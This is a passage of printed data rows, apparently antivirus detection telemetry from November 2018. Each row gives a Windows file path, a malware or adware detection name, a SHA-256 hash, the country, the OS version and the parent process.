  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:01:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-195347-6a29c5ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e99219dd\\AVSCAN-20181104-195211-5E1A8817\\AVSCAN-20181104-195347-6A29C5AC', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T18:54:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='webdbg.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio .NET 2003\\Common7\\Tools\\WebDbg.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='f59808154fc19bdae8d213c379265e5c61c08e477f9fbaea9203eeeb522d70c9', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:11:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='f95885da22605aef77694b503630c540b908f5f91b04a986d4a0a2949a044337', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T20:22:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gccustomhook.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\OOBE\\PDApp\\AdobeGCClient\\customhook\\gccustomhook.exe', filesize=1976000, name='W32/Sality.AT.#M1.#R1'), hash='f9ad4e88dc6d468f7e5dbaf4ee5246095b2c767ccd9da38dee4f1f149f917baf', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:43:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tsmuxer.exe', filepath='C:\\Program Files\\FormatFactory\\FFModules\\Encoder\\tsMuxer.exe', filesize=320000, name='W32/Ramnit.CD.#M1.#R1'), hash='f48853db0920f2515eebea04252dadc15c91b23f9dfbb15f27d96e379c0f7d2d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Mozilla Firefox\\firefox.exe', parentsize=450512, timestamp='2018-11-01T17:45:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fe75a3573afafb3fdb0a070d0324a8eb30fe8d8e72df144d3ba52433ad9eea8b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\FE75A3573AFAFB3FDB0A070D0324A8EB30FE8D8E72DF144D3BA52433AD9EEA8B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fe75a3573afafb3fdb0a070d0324a8eb30fe8d8e72df144d3ba52433ad9eea8b', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:29:41Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='wncserve.exe', filepath='\\\\?\\C:\\WorkNC-LicenseServer\\exe\\msw\\wncserve.exe', filesize=1088000, name='HEUR/APC.#M1.#R1'), hash='45b04542f0eade0ffd244589510db60267f875f7e1f4b675591d7a124d4b7be9', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T19:38:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='favorites.bat', filepath='C:\\Users\\X\\Favorites\\Favorites.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:51:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-140527-7fa9a554', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1cab3c85\\AVSCAN-20181102-140456-79007B41\\AVSCAN-20181102-140527-7FA9A554', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:05:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='minimap-sidebar-0317-fx-downloader.exe', filepath='L:\\Users\\X\\Downloads\\minimap-sidebar-0317-fx-Downloader.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='2856f75836e80cef64f96f94263227ae845897202542f05f4fbf00f1b215b97e', metadata=Row(cmdline='\\\\\\/Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\dllhost.exe', parentsize=19360, timestamp='2018-11-02T17:17:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3d940c436f9525480c10612bec3cef2f4504ae5920b045eadca2de14f504aa35', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-2.available\\Avira\\3D940C436F9525480C10612BEC3CEF2F4504AE5920B045EADCA2DE14F504AA35', filesize=640000, name='ADWARE/BrowseFox.Gen7.#M300.#R601892'), hash='3d940c436f9525480c10612bec3cef2f4504ae5920b045eadca2de14f504aa35', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T06:05:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate (1).exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='52f99fcbf44511b44e259588d108dd195cbdcc3e629cca0140a65a22aa14bd85', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T01:49:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155823-e2bb1420', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155823-E2BB1420', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:58:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-182108-812ce8ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2a82e24d\\AVSCAN-20181102-181753-5E756B46\\AVSCAN-20181102-182108-812CE8FF', filesize=960000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='5a436798dbe7503e99e0db771b57e5f33da119ee6b3f5ebe8d3f37aa3c8e7ec5', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:21:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-07-05-09.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T22:15:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maps.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\MAPS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='188b28fbff3e4d12c611cd81c7d5f775a9bacfad56e8e8765d968c7ce349ba3b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-6.categorizing\\188B28FBFF3E4D12C611CD81C7D5F775A9BACFAD56E8E8765D968C7CE349BA3B', filesize=896000, name='W32/Virut.Gen.#M1.#R1'), hash='188b28fbff3e4d12c611cd81c7d5f775a9bacfad56e8e8765d968c7ce349ba3b', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 19.0.0\\avp.exe', parentsize=619640, timestamp='2018-11-02T13:21:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\OneDrive\\LAB\\A\\MITSUBISHI LUCIANO\\PAJERO NOVA DAKAR - PWJE1712R\\TOOL\\VISTAMSV\\ENV\\VISTAMSVJ\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='59d00a3eeb355cfefe0e00342c4ee1f97c98956747a2edb2076abde9b1dc7cb8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe48_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe48 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T13:07:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe191_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe191 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T23:44:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='docs.exe', filepath='I:\\ألعاب\\Games 1\\بليردو\\RECOIL\\DOCS\\DOCS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1c5eb2619262d5e3ad6cf9bb4b426c77f5fae858e22fa503d330aa1a94b6b8e7', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:41:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='need for speed the run.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Need For Speed The Run\\Need For Speed The Run.exe', filesize=7808000, name='W32/Virut.Gen.#M1.#R1'), hash='6b29dfb7c7c4dfe2919e997510c9d39000b5c56ec90113d7067ffecba1619c65', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:59:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T20:17:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lightmaps.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL11\\lightmaps\\lightmaps.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='12c1bba7f31ae2dfcf1472f71fb009ed64afcf02a7695f6e24e2a72ab1263410', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-16-07-33.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-17T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T10:27:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret.exe', filepath='H:\\مجلد جديد (2)\\Windows.10.Manager.2.3.6.www.download.ir\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3904304, timestamp='2018-11-02T17:54:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='blackstorm.dlr', filepath='C:\\Program Files\\Autodesk\\3ds Max 2014\\stdplugs\\BlackStorm.dlr', filesize=576000, name='TR/Crypt.XPACK.Gen.#M300.#R7269'), hash='24296f07b2db13327c95a6547a6c0d82387a8476158e8bf57a3931f68293d379', metadata=Row(cmdline=None, country='AE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Autodesk\\3ds Max 2014\\3dsmax.exe', parentsize=11053896, timestamp='2018-11-02T07:31:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:02:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='grz.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nse1BBF.tmp\\grz.dll', filesize=128000, name='PUA/Outbrowse.Gen.#M300.#R5697'), hash='3577e7c4fa2928e55c23297eab7408e1aee995c8695eee43bd05be25d3238ec2', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T08:51:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-130747-b9700410', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_57284e1a\\AVSCAN-20181102-130334-A080FDCF\\AVSCAN-20181102-130747-B9700410', filesize=1600000, name='Adware/DealPly.bqeij.#M1.#R1'), hash='1623129501d3a77f371635e57f9f599b6a3d3d202427c7d5a95ca710d9f22f8b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:07:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='program.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\PROGRAM\\PROGRAM.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:03:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104235-f97bf6ea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-104235-F97BF6EA', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:42:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='991851e71c62c5e345e376a662477bb3075cf309', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\991851e71c62c5e345e376a662477bb3075cf309', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:55:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:52:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mhautopatch.exe', filepath='C:\\Users\\X\\Desktop\\MHAutoPatch.exe', filesize=2560000, name='TR/Black.Gen2.#M300.#R100338'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T09:04:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0ba07dcc666c77ab9c3af399c1d46d1651616c4fdcea0db4efa33e7088e57942', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0BA07DCC666C77AB9C3AF399C1D46D1651616C4FDCEA0DB4EFA33E7088E57942', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='0ba07dcc666c77ab9c3af399c1d46d1651616c4fdcea0db4efa33e7088e57942', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:24:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T03:02:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:12Z'), dt=datetime.date(2018, 11, 2)),
